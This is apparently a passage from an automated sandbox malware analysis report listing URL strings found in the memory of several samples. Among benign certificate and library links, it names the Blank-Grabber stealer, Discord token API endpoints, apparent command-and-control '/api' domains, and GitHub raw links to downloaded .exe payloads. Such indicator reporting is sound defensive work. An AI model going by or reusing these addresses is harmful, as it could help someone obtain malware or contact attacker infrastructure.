                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0shtable_get
                                Source: D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0shtable_get_Py_hashtable_hash_ptr_Py_hashtable_new_Py_hashtable_new_full_Py
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0$
                                Source: D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigor
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469283527.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469283527.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                                Source: powershell.exe, 00000011.00000002.2659507683.0000028A8581A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/api
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                                Source: D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                                Source: D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                                Source: D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                                Source: D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/apijdo
                                Source: D1UL0FG.exe, 00000006.00000002.2996941109.000001FA2E830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-GrabberrV
                                Source: D1UL0FG.exe, 00000006.00000003.2479764407.000001FA2E279000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479979296.000001FA2E83D000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2480587995.000001FA2E348000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479451301.000001FA2E348000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479664796.000001FA2E254000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2481335811.000001FA2E26A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2480317541.000001FA2E251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe
                                Source: skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000003.5971400666.0000000001402000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.0000000001402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                Source: D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                Source: D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                Source: D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                Source: D1UL0FG.exe, 00000006.00000002.2996941109.000001FA2E830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                                Source: D1UL0FG.exe, 00000006.00000003.2537713866.000001FA2E3D8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2538084119.000001FA2E3E2000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2997186323.000001FA2E940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                                Source: D1UL0FG.exe, 00000006.00000002.2997434338.000001FA2EA70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.comX
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F951A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2537129441.000001FA2DFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                                Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                                Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                                Source: D1UL0FG.exe, 00000006.00000003.2537129441.000001FA2DFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                Source: 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.00000000012D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                                Source: 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.00000000012D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/apif
                                Source: 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                                Source: D1UL0FG.exe, 00000006.00000002.2994686115.000001FA2E430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                                Source: 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com//
                                Source: 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/5
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/;
                                Source: 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3045357571.0000000001365000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiG
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiN
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apialif_
                                Source: 8ZVMneG.exe, 00000054.00000003.3041726825.0000000001363000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3045357571.0000000001365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apih0Y
                                Source: 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apil
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/eK
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/om
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.00000000012D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piu
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/rtner.-K
                                Source: 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/u/
                                Source: 8ZVMneG.exe, 00000054.00000003.2991447844.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.3042502917.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3047482632.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.3016986750.0000000003BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiVm%2FJ0rmsy%2BhN1oSL3JKRhoJXC4AvQ6UHJ%2BO6lT%2FGF727v%2B49o4tEmttjRuu
                                Source: 8ZVMneG.exe, 00000054.00000003.2912967737.0000000003BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apil
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ED28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ED4C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
